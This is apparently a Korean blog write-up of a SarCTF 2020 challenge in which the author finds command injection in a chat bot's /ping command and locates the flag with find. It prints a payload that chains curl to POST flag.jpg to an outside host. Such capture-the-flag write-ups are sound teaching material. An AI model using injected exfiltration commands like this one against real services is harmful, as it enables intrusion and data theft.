문제를 들어가기 전에 Login 하는 거에 굉장히 조심스러웠습니다.
vk.com이 제대로된 사이트인지 좀 더 검증하고 문제를 풀이하였습니다.
(물론 정상적인 러시아 버전 페이스북인 걸 알고 구글 계정을 연동하였습니다.)
메신저로 들어가 commands를 입력해서 여러 시도를 해보는 도중 /ping 이 있길래, 혹시 커맨드 인젝션이 되는지 테스트해보았습니다.
현재 CTF가 끝나고 명령이 되진 않지만, 위와 같이 했을 때 되는 것을 확인하였습니다.
처음에는 ls를 해보고자 했는데 띄어쓰기가 되는 값을 GET 뒤에 붙여서 전송되지는 않아, README.txt밖에 안 보였습니다.
그래서 find 명령어로 혹시 flag라는 녀석이 있는지 찾아보았습니다.
위와 같이 테스트해본 결과 여러 결과가 나왔는데, curl명령어로 GET으로 보내는 데에는 한계가 있어, POST 명령어로 전송해보았습니다.
flag.jpg위치는 바로 아래였던 것이 행운이었습니다.
/ping - ping 1.1.1.1;curl -X POST -F file=@flag.jpg http://kkamikoon.com:7777
위의 명령을 받기 위해 아래와 같이 받았습니다.
근데 값을 받아보니 HTTP Header들도 좀 있어서 HxD로 제거해주고 온전한 이미지 파일로 받았습니다.
열어보니 아래와 같이 열려 플래그를 인증할 수 있었습니다.
'CTF > 2020_SarCTF' 카테고리의 다른 글
SarCTF2020 - Crossw0rd (Rev) (0) | 2020.02.18 |
---|---|
SarCTF2020 - Layout (Misc - Programming) (0) | 2020.02.17 |
SarCTF2020 - Deep Dive (Misc - Programming) (0) | 2020.02.17 |
SarCTF2020 - Car for Sherlok (Web - Race Condition) (0) | 2020.02.17 |